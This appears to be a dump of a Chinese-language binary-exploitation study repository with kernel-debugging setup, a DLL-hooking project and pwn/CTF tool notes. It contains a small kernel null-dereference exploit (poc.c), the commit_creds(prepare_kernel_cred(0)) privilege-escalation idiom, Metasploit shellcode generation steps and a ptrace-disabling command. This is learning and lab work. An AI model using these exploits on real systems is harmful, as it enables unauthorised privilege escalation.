-------------------------------------------------------------------------------- 1 | # Ring0 Environment 2 | 3 | ## Environment 4 | 5 | 手动下载需要版本的源码,然后进行编译。(遇到问题google基本能解决) 6 | 7 | 8 | ### qemu-system 9 | 10 | 要让qemu能跑起来,并调试内核,需要 11 | ```bash 12 | qemu-system-i386 -nographic -kernel ./linux-2.6.32.1/arch/i386/boot/bzImage -append "console=ttyS0" -initrd ./busybox-1.19.4/initramfs-busybox-x86.cpio.gz -gdb tcp::1234 -S 13 | ``` 14 | 15 | 具体操作: 16 | 1. `gdb vmlinux`(vmlinux是编译linux的时候产生的符号表),然后`target remote localhost:1234` 17 | 2. 启动`run.sh`,也就是启动`qemu`虚拟机 18 | 3. 在gdb中下断点,然后就可以调试了 19 | 20 | 21 | ## Ref 22 | 23 | 1. [qemu kernel debug](https://en.wikibooks.org/wiki/QEMU/Debugging_with_QEMU) 24 | 2. [setup linux kernel in qemu](https://beyermatthias.de/blog/2016/11/01/setup-for-linux-kernel-dev-using-qemu/) 25 | 26 | 27 | -------------------------------------------------------------------------------- /Kernel/Environment/busybox/x86-busybox/init: -------------------------------------------------------------------------------- 1 | #!/bin/sh 2 | 3 | mount -t proc none /proc 4 | mount -t sysfs none /sys 5 | 6 | echo -e "\nBoot took $(cut -d' ' -f1 /proc/uptime) seconds\n" 7 | 8 | echo ''' 9 | i ii i 10 | ii iii iii iii 11 | ii iii 12 | iiiiii iiii iiiiiiiii iii iiiii 13 | iiiii ii iii ii iiiii iii 14 | iiii ii iiii iiii iii 15 | ii ii iiiii iii ii 16 | ii ii iii iii ii 17 | ii iiii i iii iii ii 18 | i ii iiii i ii 19 | 20 | ''' 21 | 22 | su fish 23 | exec /bin/sh 24 | 25 | 26 | -------------------------------------------------------------------------------- /Kernel/Environment/busybox/x86-busybox/linuxrc: -------------------------------------------------------------------------------- 1 | bin/busybox -------------------------------------------------------------------------------- /Kernel/Environment/busybox/x86-busybox/null_dereference.ko: -------------------------------------------------------------------------------- 
https://raw.githubusercontent.com/SteinsGatep001/Binary/1c143c774ebaa50d87939b59588b4a82efc28af9/Kernel/Environment/busybox/x86-busybox/null_dereference.ko -------------------------------------------------------------------------------- /Kernel/Environment/busybox/x86-busybox/prod.sh: -------------------------------------------------------------------------------- 1 | #!/bin/sh 2 | 3 | find . -print0 \ 4 | | cpio --null -ov --format=newc \ 5 | | gzip -9 > /tmp/initramfs-busybox-x86.cpio.gz 6 | 7 | -------------------------------------------------------------------------------- /Kernel/Environment/initbusybox.sh: -------------------------------------------------------------------------------- 1 | #!/bin/sh 2 | 3 | touch etc/passwd 4 | touch etc/group 5 | echo '''root:x:0:0:root:/root:/bin/sh 6 | fish:x:1000:1000:suctf:/home/fish:/bin/sh''' >> etc/passwd 7 | 8 | echo '''root:x:0: 9 | tty:x:4: 10 | fish:x:1000:''' >> etc/group 11 | 12 | -------------------------------------------------------------------------------- /Kernel/Environment/linux_source/f1sh/.built-in.o.cmd: -------------------------------------------------------------------------------- 1 | cmd_f1sh/built-in.o := ld -m elf_i386 -r -o f1sh/built-in.o f1sh/sys_f1sh.o 2 | -------------------------------------------------------------------------------- /Kernel/Environment/linux_source/f1sh/.sys_f1sh.o.cmd: -------------------------------------------------------------------------------- 1 | cmd_f1sh/sys_f1sh.o := gcc -Wp,-MD,f1sh/.sys_f1sh.o.d -nostdinc -isystem /usr/lib/gcc/i686-linux-gnu/4.8/include -Iinclude -I/home/d3adf1sh/Kernel/Linux-2_6_32/linux-2.6.32.1/arch/x86/include -include include/linux/autoconf.h -D__KERNEL__ -Wall -Wundef -Wstrict-prototypes -Wno-trigraphs -fno-strict-aliasing -fno-common -Werror-implicit-function-declaration -Wno-format-security -fno-delete-null-pointer-checks -O2 -m32 -msoft-float -mregparm=3 -freg-struct-return -mpreferred-stack-boundary=2 -march=i686 -mtune=generic 
-Wa,-mtune=generic32 -ffreestanding -fstack-protector -DCONFIG_AS_CFI=1 -DCONFIG_AS_CFI_SIGNAL_FRAME=1 -pipe -Wno-sign-compare -fno-asynchronous-unwind-tables -mno-sse -mno-mmx -mno-sse2 -mno-3dnow -Wframe-larger-than=1024 -fno-omit-frame-pointer -fno-optimize-sibling-calls -g -pg -Wdeclaration-after-statement -Wno-pointer-sign -fno-strict-overflow -fno-dwarf2-cfi-asm -fconserve-stack -D"KBUILD_STR(s)=\#s" -D"KBUILD_BASENAME=KBUILD_STR(sys_f1sh)" -D"KBUILD_MODNAME=KBUILD_STR(sys_f1sh)" -D"DEBUG_HASH=39" -D"DEBUG_HASH2=34" -c -o f1sh/.tmp_sys_f1sh.o f1sh/sys_f1sh.c 2 | 3 | deps_f1sh/sys_f1sh.o := \ 4 | f1sh/sys_f1sh.c \ 5 | include/linux/kernel.h \ 6 | $(wildcard include/config/lbdaf.h) \ 7 | $(wildcard include/config/preempt/voluntary.h) \ 8 | $(wildcard include/config/debug/spinlock/sleep.h) \ 9 | $(wildcard include/config/prove/locking.h) \ 10 | $(wildcard include/config/printk.h) \ 11 | $(wildcard include/config/dynamic/debug.h) \ 12 | $(wildcard include/config/ring/buffer.h) \ 13 | $(wildcard include/config/tracing.h) \ 14 | $(wildcard include/config/numa.h) \ 15 | $(wildcard include/config/ftrace/mcount/record.h) \ 16 | /usr/lib/gcc/i686-linux-gnu/4.8/include/stdarg.h \ 17 | include/linux/linkage.h \ 18 | include/linux/compiler.h \ 19 | $(wildcard include/config/trace/branch/profiling.h) \ 20 | $(wildcard include/config/profile/all/branches.h) \ 21 | $(wildcard include/config/enable/must/check.h) \ 22 | $(wildcard include/config/enable/warn/deprecated.h) \ 23 | include/linux/compiler-gcc.h \ 24 | $(wildcard include/config/arch/supports/optimized/inlining.h) \ 25 | $(wildcard include/config/optimize/inlining.h) \ 26 | include/linux/compiler-gcc4.h \ 27 | /home/d3adf1sh/Kernel/Linux-2_6_32/linux-2.6.32.1/arch/x86/include/asm/linkage.h \ 28 | $(wildcard include/config/x86/32.h) \ 29 | $(wildcard include/config/x86/64.h) \ 30 | $(wildcard include/config/x86/alignment/16.h) \ 31 | include/linux/stringify.h \ 32 | include/linux/stddef.h \ 33 | include/linux/types.h 
\ 34 | $(wildcard include/config/uid16.h) \ 35 | $(wildcard include/config/phys/addr/t/64bit.h) \ 36 | $(wildcard include/config/64bit.h) \ 37 | /home/d3adf1sh/Kernel/Linux-2_6_32/linux-2.6.32.1/arch/x86/include/asm/types.h \ 38 | $(wildcard include/config/highmem64g.h) \ 39 | include/asm-generic/types.h \ 40 | include/asm-generic/int-ll64.h \ 41 | /home/d3adf1sh/Kernel/Linux-2_6_32/linux-2.6.32.1/arch/x86/include/asm/bitsperlong.h \ 42 | include/asm-generic/bitsperlong.h \ 43 | include/linux/posix_types.h \ 44 | /home/d3adf1sh/Kernel/Linux-2_6_32/linux-2.6.32.1/arch/x86/include/asm/posix_types.h \ 45 | /home/d3adf1sh/Kernel/Linux-2_6_32/linux-2.6.32.1/arch/x86/include/asm/posix_types_32.h \ 46 | include/linux/bitops.h \ 47 | $(wildcard include/config/generic/find/first/bit.h) \ 48 | $(wildcard include/config/generic/find/last/bit.h) \ 49 | $(wildcard include/config/generic/find/next/bit.h) \ 50 | /home/d3adf1sh/Kernel/Linux-2_6_32/linux-2.6.32.1/arch/x86/include/asm/bitops.h \ 51 | $(wildcard include/config/x86/cmov.h) \ 52 | /home/d3adf1sh/Kernel/Linux-2_6_32/linux-2.6.32.1/arch/x86/include/asm/alternative.h \ 53 | $(wildcard include/config/smp.h) \ 54 | $(wildcard include/config/paravirt.h) \ 55 | /home/d3adf1sh/Kernel/Linux-2_6_32/linux-2.6.32.1/arch/x86/include/asm/asm.h \ 56 | /home/d3adf1sh/Kernel/Linux-2_6_32/linux-2.6.32.1/arch/x86/include/asm/cpufeature.h \ 57 | $(wildcard include/config/x86/invlpg.h) \ 58 | /home/d3adf1sh/Kernel/Linux-2_6_32/linux-2.6.32.1/arch/x86/include/asm/required-features.h \ 59 | $(wildcard include/config/x86/minimum/cpu/family.h) \ 60 | $(wildcard include/config/math/emulation.h) \ 61 | $(wildcard include/config/x86/pae.h) \ 62 | $(wildcard include/config/x86/cmpxchg64.h) \ 63 | $(wildcard include/config/x86/use/3dnow.h) \ 64 | $(wildcard include/config/x86/p6/nop.h) \ 65 | include/asm-generic/bitops/sched.h \ 66 | include/asm-generic/bitops/hweight.h \ 67 | include/asm-generic/bitops/fls64.h \ 68 | 
include/asm-generic/bitops/ext2-non-atomic.h \ 69 | include/asm-generic/bitops/le.h \ 70 | /home/d3adf1sh/Kernel/Linux-2_6_32/linux-2.6.32.1/arch/x86/include/asm/byteorder.h \ 71 | include/linux/byteorder/little_endian.h \ 72 | include/linux/swab.h \ 73 | /home/d3adf1sh/Kernel/Linux-2_6_32/linux-2.6.32.1/arch/x86/include/asm/swab.h \ 74 | $(wildcard include/config/x86/bswap.h) \ 75 | include/linux/byteorder/generic.h \ 76 | include/asm-generic/bitops/minix.h \ 77 | include/linux/log2.h \ 78 | $(wildcard include/config/arch/has/ilog2/u32.h) \ 79 | $(wildcard include/config/arch/has/ilog2/u64.h) \ 80 | include/linux/typecheck.h \ 81 | include/linux/ratelimit.h \ 82 | include/linux/param.h \ 83 | /home/d3adf1sh/Kernel/Linux-2_6_32/linux-2.6.32.1/arch/x86/include/asm/param.h \ 84 | include/asm-generic/param.h \ 85 | $(wildcard include/config/hz.h) \ 86 | include/linux/dynamic_debug.h \ 87 | /home/d3adf1sh/Kernel/Linux-2_6_32/linux-2.6.32.1/arch/x86/include/asm/bug.h \ 88 | $(wildcard include/config/bug.h) \ 89 | $(wildcard include/config/debug/bugverbose.h) \ 90 | include/asm-generic/bug.h \ 91 | $(wildcard include/config/generic/bug.h) \ 92 | $(wildcard include/config/generic/bug/relative/pointers.h) \ 93 | /home/d3adf1sh/Kernel/Linux-2_6_32/linux-2.6.32.1/arch/x86/include/asm/div64.h \ 94 | 95 | f1sh/sys_f1sh.o: $(deps_f1sh/sys_f1sh.o) 96 | 97 | $(deps_f1sh/sys_f1sh.o): 98 | -------------------------------------------------------------------------------- /Kernel/Environment/linux_source/f1sh/Makefile: -------------------------------------------------------------------------------- 1 | obj-y := sys_f1sh.o 2 | -------------------------------------------------------------------------------- /Kernel/Environment/linux_source/f1sh/sys_f1sh.c: -------------------------------------------------------------------------------- 1 | #include 2 | #define F1SH_DEBUG 1 3 | asmlinkage long sys_f1sh(int arg0) 4 | { 5 | #if F1SH_DEBUG 6 | printk("syscall arg %d",arg0); 7 | 
printk("\n23333333\n"); 8 | #endif 9 | return ((long)arg0); 10 | } 11 | -------------------------------------------------------------------------------- /Kernel/Environment/run.sh: -------------------------------------------------------------------------------- 1 | #!/bin/sh 2 | 3 | qemu-system-x86_64 \ 4 | -kernel obj/linux-x86-basic/arch/x86_64/boot/bzImage \ 5 | -initrd /tmp/initramfs-busybox-x86.cpio.gz \ 6 | -nographic -append "console=ttyS0 quiet" \ 7 | -monitor /dev/null \ 8 | -nographic \ 9 | 2>/dev/null 10 | 11 | -------------------------------------------------------------------------------- /Kernel/Environment/src/Makefile: -------------------------------------------------------------------------------- 1 | CC=gcc 2 | CFLAGS=-static 3 | RM = rm -f 4 | 5 | ELF_BIN=poc 6 | 7 | .DEFAULT_GOAL := all 8 | all: $(ELF_BIN) 9 | 10 | $(ELF_BIN): poc.c 11 | $(CC) $(CFLAGS) $^ -o $@ 12 | 13 | clean: 14 | $(RM) $(ELF_BIN) 15 | 16 | -------------------------------------------------------------------------------- /Kernel/Environment/src/poc.c: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | #include 5 | #include 6 | #include 7 | char payload[] = "\xe9\xea\xbe\xad\x0b";//jmp 0xbadbeef 8 | int main() 9 | { 10 | mmap(0, 4096,PROT_READ | PROT_WRITE | PROT_EXEC, MAP_FIXED | MAP_PRIVATE | MAP_ANONYMOUS ,-1, 0); 11 | memcpy(0, payload, sizeof(payload)); 12 | int fd = open("/proc/bug1", O_WRONLY); 13 | write(fd, "f1sh", 4); 14 | return 0; 15 | } 16 | -------------------------------------------------------------------------------- /Kernel/README.md: -------------------------------------------------------------------------------- 1 | 2 | ## Resources 3 | 4 | 1. 
[linux kernel exploitation](https://github.com/xairy/linux-kernel-exploitation) 5 | 6 | ## debug 7 | 8 | ### symbol 9 | 如果`module`没有去`symbol`,可以加载下`symbol`方便调试 10 | ``` 11 | add-symbol-file example.ko [address] 12 | ``` 13 | 14 | ### find function address 15 | 16 | in `busybox` 17 | ``` 18 | grep prepare_kernel_cred /proc/kallsyms 19 | ``` 20 | 21 | ## basic 22 | 23 | 提权 24 | ```C 25 | commit_creds(prepare_kernel_cred(0)); 26 | ``` 27 | 28 | ## To be continued 29 | 30 | -------------------------------------------------------------------------------- /Malware/Dll_Hook/Dll_Hook.sln: -------------------------------------------------------------------------------- 1 |  2 | Microsoft Visual Studio Solution File, Format Version 12.00 3 | # Visual Studio 15 4 | VisualStudioVersion = 15.0.26009.0 5 | MinimumVisualStudioVersion = 10.0.40219.1 6 | Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "Dll_Hook", "Dll_Hook\Dll_Hook.vcxproj", "{6EEE5DB7-E004-4BC0-90E6-33F1092B1343}" 7 | EndProject 8 | Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "Dll_Hook_app0", "Dll_Hook_app0\Dll_Hook_app0.vcxproj", "{325FC96A-6142-4F7C-A7AA-E3229DE19752}" 9 | EndProject 10 | Global 11 | GlobalSection(SolutionConfigurationPlatforms) = preSolution 12 | Debug|x64 = Debug|x64 13 | Debug|x86 = Debug|x86 14 | Release|x64 = Release|x64 15 | Release|x86 = Release|x86 16 | EndGlobalSection 17 | GlobalSection(ProjectConfigurationPlatforms) = postSolution 18 | {6EEE5DB7-E004-4BC0-90E6-33F1092B1343}.Debug|x64.ActiveCfg = Debug|x64 19 | {6EEE5DB7-E004-4BC0-90E6-33F1092B1343}.Debug|x64.Build.0 = Debug|x64 20 | {6EEE5DB7-E004-4BC0-90E6-33F1092B1343}.Debug|x86.ActiveCfg = Debug|Win32 21 | {6EEE5DB7-E004-4BC0-90E6-33F1092B1343}.Debug|x86.Build.0 = Debug|Win32 22 | {6EEE5DB7-E004-4BC0-90E6-33F1092B1343}.Release|x64.ActiveCfg = Release|x64 23 | {6EEE5DB7-E004-4BC0-90E6-33F1092B1343}.Release|x64.Build.0 = Release|x64 24 | {6EEE5DB7-E004-4BC0-90E6-33F1092B1343}.Release|x86.ActiveCfg = Release|Win32 25 | 
{6EEE5DB7-E004-4BC0-90E6-33F1092B1343}.Release|x86.Build.0 = Release|Win32 26 | {325FC96A-6142-4F7C-A7AA-E3229DE19752}.Debug|x64.ActiveCfg = Debug|x64 27 | {325FC96A-6142-4F7C-A7AA-E3229DE19752}.Debug|x64.Build.0 = Debug|x64 28 | {325FC96A-6142-4F7C-A7AA-E3229DE19752}.Debug|x86.ActiveCfg = Debug|Win32 29 | {325FC96A-6142-4F7C-A7AA-E3229DE19752}.Debug|x86.Build.0 = Debug|Win32 30 | {325FC96A-6142-4F7C-A7AA-E3229DE19752}.Release|x64.ActiveCfg = Release|x64 31 | {325FC96A-6142-4F7C-A7AA-E3229DE19752}.Release|x64.Build.0 = Release|x64 32 | {325FC96A-6142-4F7C-A7AA-E3229DE19752}.Release|x86.ActiveCfg = Release|Win32 33 | {325FC96A-6142-4F7C-A7AA-E3229DE19752}.Release|x86.Build.0 = Release|Win32 34 | EndGlobalSection 35 | GlobalSection(SolutionProperties) = preSolution 36 | HideSolutionNode = FALSE 37 | EndGlobalSection 38 | EndGlobal 39 | -------------------------------------------------------------------------------- /Malware/Dll_Hook/Dll_Hook/Dll_Hook.aps: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/SteinsGatep001/Binary/1c143c774ebaa50d87939b59588b4a82efc28af9/Malware/Dll_Hook/Dll_Hook/Dll_Hook.aps -------------------------------------------------------------------------------- /Malware/Dll_Hook/Dll_Hook/Dll_Hook.cpp: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/SteinsGatep001/Binary/1c143c774ebaa50d87939b59588b4a82efc28af9/Malware/Dll_Hook/Dll_Hook/Dll_Hook.cpp -------------------------------------------------------------------------------- /Malware/Dll_Hook/Dll_Hook/Dll_Hook.h: -------------------------------------------------------------------------------- 1 | #pragma once 2 | 3 | #include 4 | #include 5 | #include 6 | #include 7 | #include 8 | #include 9 | #include 10 | 11 | #ifdef INJ_DLL_API 12 | 13 | #else 14 | 15 | #define INJ_DLL_API extern "C" __declspec(dllexport) 16 | 17 | #endif 18 | 19 | INJ_DLL_API void WINAPI 
StartHook(void); 20 | INJ_DLL_API void WINAPI StopHook(void); 21 | 22 | 23 | 24 | 25 | 26 | -------------------------------------------------------------------------------- /Malware/Dll_Hook/Dll_Hook/Dll_Hook.rc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/SteinsGatep001/Binary/1c143c774ebaa50d87939b59588b4a82efc28af9/Malware/Dll_Hook/Dll_Hook/Dll_Hook.rc -------------------------------------------------------------------------------- /Malware/Dll_Hook/Dll_Hook/Dll_Hook.vcxproj: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | 5 | Debug 6 | Win32 7 | 8 | 9 | Release 10 | Win32 11 | 12 | 13 | Debug 14 | x64 15 | 16 | 17 | Release 18 | x64 19 | 20 | 21 | 22 | {6EEE5DB7-E004-4BC0-90E6-33F1092B1343} 23 | Win32Proj 24 | Dll_Hook 25 | 10.0.14393.0 26 | 27 | 28 | 29 | DynamicLibrary 30 | true 31 | v141 32 | Unicode 33 | 34 | 35 | DynamicLibrary 36 | false 37 | v141 38 | true 39 | Unicode 40 | 41 | 42 | DynamicLibrary 43 | true 44 | v141 45 | Unicode 46 | 47 | 48 | DynamicLibrary 49 | false 50 | v141 51 | true 52 | Unicode 53 | 54 | 55 | 56 | 57 | 58 | 59 | 60 | 61 | 62 | 63 | 64 | 65 | 66 | 67 | 68 | 69 | 70 | 71 | 72 | 73 | true 74 | 75 | 76 | true 77 | 78 | 79 | false 80 | 81 | 82 | false 83 | 84 | 85 | 86 | 87 | 88 | Level3 89 | Disabled 90 | WIN32;_DEBUG;_WINDOWS;_USRDLL;DLL_HOOK_EXPORTS;%(PreprocessorDefinitions) 91 | 92 | 93 | Windows 94 | Source.def 95 | 96 | 97 | 98 | 99 | 100 | 101 | Level3 102 | Disabled 103 | _DEBUG;_WINDOWS;_USRDLL;DLL_HOOK_EXPORTS;%(PreprocessorDefinitions) 104 | 105 | 106 | Windows 107 | Source.def 108 | 109 | 110 | 111 | 112 | Level3 113 | 114 | 115 | MaxSpeed 116 | true 117 | true 118 | WIN32;NDEBUG;_WINDOWS;_USRDLL;DLL_HOOK_EXPORTS;%(PreprocessorDefinitions) 119 | 120 | 121 | Windows 122 | true 123 | true 124 | Source.def 125 | 126 | 127 | 128 | 129 | Level3 130 | 131 | 132 | MaxSpeed 133 | true 134 | true 135 | 
NDEBUG;_WINDOWS;_USRDLL;DLL_HOOK_EXPORTS;%(PreprocessorDefinitions) 136 | 137 | 138 | Windows 139 | true 140 | true 141 | Source.def 142 | 143 | 144 | 145 | 146 | 147 | 148 | 149 | 150 | 151 | 152 | 153 | 154 | 155 | 156 | 157 | 158 | 159 | 160 | -------------------------------------------------------------------------------- /Malware/Dll_Hook/Dll_Hook/Dll_Hook.vcxproj.filters: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | 5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF} 6 | cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx 7 | 8 | 9 | {93995380-89BD-4b04-88EB-625FBE52EBFB} 10 | h;hh;hpp;hxx;hm;inl;inc;xsd 11 | 12 | 13 | {67DA6AB6-F800-4c08-8B7A-83BB121AAD01} 14 | rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms 15 | 16 | 17 | 18 | 19 | 源文件 20 | 21 | 22 | 23 | 24 | 头文件 25 | 26 | 27 | 头文件 28 | 29 | 30 | 31 | 32 | 资源文件 33 | 34 | 35 | 36 | 37 | 源文件 38 | 39 | 40 | -------------------------------------------------------------------------------- /Malware/Dll_Hook/Dll_Hook/Source.def: -------------------------------------------------------------------------------- 1 | LIBRARY "Dll_Hook" 2 | EXPORTS 3 | StartHook @1 4 | StopHook @2 5 | 6 | -------------------------------------------------------------------------------- /Malware/Dll_Hook/Dll_Hook/resource.h: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/SteinsGatep001/Binary/1c143c774ebaa50d87939b59588b4a82efc28af9/Malware/Dll_Hook/Dll_Hook/resource.h -------------------------------------------------------------------------------- /Malware/Dll_Hook/Dll_Hook_app0/Dll_Hook_app0.vcxproj: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | 5 | Debug 6 | Win32 7 | 8 | 9 | Release 10 | Win32 11 | 12 | 13 | Debug 14 | x64 15 | 16 | 17 | Release 18 | x64 19 | 20 | 21 | 22 | {325FC96A-6142-4F7C-A7AA-E3229DE19752} 23 | Win32Proj 24 | 
Dll_Hook_app0 25 | 10.0.14393.0 26 | 27 | 28 | 29 | Application 30 | true 31 | v141 32 | Unicode 33 | 34 | 35 | Application 36 | false 37 | v141 38 | true 39 | Unicode 40 | 41 | 42 | Application 43 | true 44 | v141 45 | Unicode 46 | 47 | 48 | Application 49 | false 50 | v141 51 | true 52 | Unicode 53 | 54 | 55 | 56 | 57 | 58 | 59 | 60 | 61 | 62 | 63 | 64 | 65 | 66 | 67 | 68 | 69 | 70 | 71 | 72 | 73 | true 74 | 75 | 76 | true 77 | 78 | 79 | false 80 | 81 | 82 | false 83 | 84 | 85 | 86 | 87 | 88 | Level3 89 | Disabled 90 | WIN32;_DEBUG;_CONSOLE;%(PreprocessorDefinitions) 91 | 92 | 93 | Console 94 | 95 | 96 | 97 | 98 | 99 | 100 | Level3 101 | Disabled 102 | _DEBUG;_CONSOLE;%(PreprocessorDefinitions) 103 | 104 | 105 | Console 106 | 107 | 108 | 109 | 110 | Level3 111 | 112 | 113 | MaxSpeed 114 | true 115 | true 116 | WIN32;NDEBUG;_CONSOLE;%(PreprocessorDefinitions) 117 | 118 | 119 | Console 120 | true 121 | true 122 | 123 | 124 | 125 | 126 | Level3 127 | 128 | 129 | MaxSpeed 130 | true 131 | true 132 | NDEBUG;_CONSOLE;%(PreprocessorDefinitions) 133 | 134 | 135 | Console 136 | true 137 | true 138 | 139 | 140 | 141 | 142 | 143 | 144 | 145 | 146 | -------------------------------------------------------------------------------- /Malware/Dll_Hook/Dll_Hook_app0/Dll_Hook_app0.vcxproj.filters: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | 5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF} 6 | cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx 7 | 8 | 9 | {93995380-89BD-4b04-88EB-625FBE52EBFB} 10 | h;hh;hpp;hxx;hm;inl;inc;xsd 11 | 12 | 13 | {67DA6AB6-F800-4c08-8B7A-83BB121AAD01} 14 | rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms 15 | 16 | 17 | 18 | 19 | 源文件 20 | 21 | 22 | -------------------------------------------------------------------------------- /Malware/Dll_Hook/Dll_Hook_app0/main.cpp: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | 
#include 4 | #include 5 | #include 6 | #include 7 | #include 8 | 9 | typedef void (*AddFunc)(void); 10 | 11 | int main() 12 | { 13 | HMODULE hDll = LoadLibrary(_T("Dll_Hook.dll")); 14 | AddFunc StartHook = (AddFunc)GetProcAddress(hDll, "StartHook"); 15 | AddFunc StopHook = (AddFunc)GetProcAddress(hDll, "StopHook"); 16 | if (StartHook != NULL) 17 | { 18 | printf_s("found StartMonitoring function\n"); 19 | StartHook(); 20 | } 21 | StopHook(); 22 | return 0; 23 | } 24 | -------------------------------------------------------------------------------- /Malware/Dll_Hook/README.md: -------------------------------------------------------------------------------- 1 | 2 | 3 | ## Preface 4 | 5 | 一个简单的64bit dll注入,C++实现 6 | 7 | 8 | -------------------------------------------------------------------------------- /Malware/README.md: -------------------------------------------------------------------------------- 1 | 2 | 3 | ## virus 4 | 5 | 病毒orz 6 | -------------------------------------------------------------------------------- /Malware/wannacry/README.md: -------------------------------------------------------------------------------- 1 | 2 | 3 | ## Preface 4 | 5 | 2017-05-12 -- WannaCry 6 | 7 | ## Reference 8 | [FreeBuf0](http://www.freebuf.com/vuls/134602.html)
9 | [anz1](https://securingtomorrow.mcafee.com/mcafee-labs/analysis-wannacry-ransomware/) 10 | 11 | ### 样本 12 | 13 | http://bbs.pediy.com/thread-217586.htm 14 | -------------------------------------------------------------------------------- /Pwn/README.md: -------------------------------------------------------------------------------- 1 | ![](pwn_pwn.jpg) 2 | 3 | ## 1. 工具 4 | IDA+pwndbg+pwntools+... 5 | 6 | ### IDA 7 | 先祭上神器 8 | 9 | ### pwndbg 10 | 这个比peda好用一点。推荐。 11 | 12 | - **stack** 100 查看栈信息 13 | - **heap** -h 查看堆(需要更全的heap插件可以看[libheap](https://github.com/cloudburst/libheap),不过这个基本够了) 14 | 15 | #### gdb自定义hook(这里自定制用,其实pwndbg自带就完全足够了) 16 | ```asm 17 | define hook-stop 18 | >info registers 19 | >x/24wx $esp 20 | >x/2i $eip 21 | >end 22 | ``` 23 | 24 | ### pwntools 25 | 具体网上一堆教程如:[pwntools使用](http://www.cnblogs.com/pcat/p/5451780.html),这里就是个人整理一点 26 | 27 | ```Python 28 | p = process('./pwnfun') # 挂载进程 29 | elf = ELF('./pwnfun') # 看到的结果就和checksec一样 30 | p.interactive() # 弹shell 31 | context.log_level = 'debug' # 挂进程之后显示各种调试信息 32 | ``` 33 | - **DynELF**这个用来leak十分好用,不过leak格式比较难写,有点迷 34 | - elf.got['puts'] 这个少用,也有点迷,用ROPgadget(见下文)代替比较好 35 | 36 | #### dbg 37 | 38 | 关闭ptrace使得能够attach 39 | ``` 40 | echo 0 | sudo tee /proc/sys/kernel/yama/ptrace_scope 41 | ``` 42 | 程序中调用调试 43 | ``` 44 | gdb_code='b *0x4009F2\nb *0x400A6D\nb *0x400778\nb*0x400944\n' 45 | gdb.attach(proc.pidof(io)[0],gdb_code) 46 | ``` 47 | 48 | ### checksec(pwntools中也有) 49 | 50 | ``` 51 | CANARY : 覆盖返回地址基本不可利用 52 | FORTIFY : 一种安全机制 53 | NX : 堆栈不可执行 54 | PIE : 攻击时需要泄露地址 55 | RELRO : Partial: 不可修改strtab 56 | Full : 程序装载时填充got表 57 | ``` 58 | 59 | ### ropper 60 | 61 | 之前一直用`ROPgadget`,不过后来发现还是`ropper`更好 62 | 63 | ### metasploit 64 | ```bash 65 | msfconsole 66 | msf > 67 | show payloads: 显示所有渗透模块 68 | use linux/x64/exec: 使用linux x64 模块 69 | set cmd /bin/sh 70 | generate -t py -b "/x00":产生shellcode /xXX的形式 71 | ``` 72 | 73 | ### radare2(要用的话再积累 IDA更加方便) 74 | ```gdb 75 | aaa 76 | [x] Analyze all flags 
starting with sym. and entry0 (aa) 77 | [x] Analyze len bytes of instructions for references (aar) 78 | [x] Analyze function calls (aac) 79 | s sym.main:运行到main处 80 | pdf:打印汇编 81 | odd [strings]: 给参数来运行程序 82 | dc: 运行程序 83 | db: 下断点 84 | dr: 查看所有寄存器信息 85 | VV: 查看调用关系视图 86 | afvn [name] [name]: 重命名,类似ida的n 87 | 88 | echo disass main | gdb ./[program] 利用管道来调试 89 | "\41\xffABCD".encode('hex' 90 | set disassembly-flavor intel 设置为x86汇编显示 91 | ``` 92 | 93 | 94 | ## 2. Complie 95 | - gcc 96 | ```bash 97 | -fno-stack-protector// 去除栈保护 如 gcc -m32 -g -fno-stack-protector -z execstack -o vuln vuln.c 98 | ``` 99 | - nasm 100 | ```bash 101 | nasm -f elf -o vlun.o vuln.asm //编译 102 | ld -m elf_i386 -s -o vuln vuln.o vuln.o //链接 103 | ./vuln 运行 104 | ``` 105 | 106 | ## 3. 一些姿势 107 | 108 | ### 连接 109 | ```bash 110 | ssh user@192.168.47.143 用来连接目标主机 111 | scp user@192.168.47.143 [filename] [dir] 112 | scp -P2222 col@pwnable.kr:/home/passcode 113 | ``` 114 | ### 程序加载追踪 115 | ```bash 116 | ltrace 117 | strace 118 | ``` 119 | ### 测试 120 | 主要看socat用法 121 | ```bash 122 | socat tcp-listen:12345 exec:./stack_overflow 把程序放到本机运行 123 | socat tcp-listen:22333,reuseaddr,fork system:./pwnme 保持程序一直执行 124 | nc 127.0.0.1 12345 本地测试连接 125 | ``` 126 | 127 | ### 调试`libc`源码 128 | 129 | 基本步骤不难 130 | 131 | 1. 安装`libc`的调试库 132 | ```bash 133 | # x86_64 134 | sudo apt-get install libc6-dbg 135 | # 32bit 可以安装下面的 136 | sudo apt-get install libc6:i386 137 | sudo apt-get install libc6-dbg:i386 138 | ``` 139 | 140 | 2. 把源码下下来`sudo apt install glibc-source` 141 | 142 | 3. 
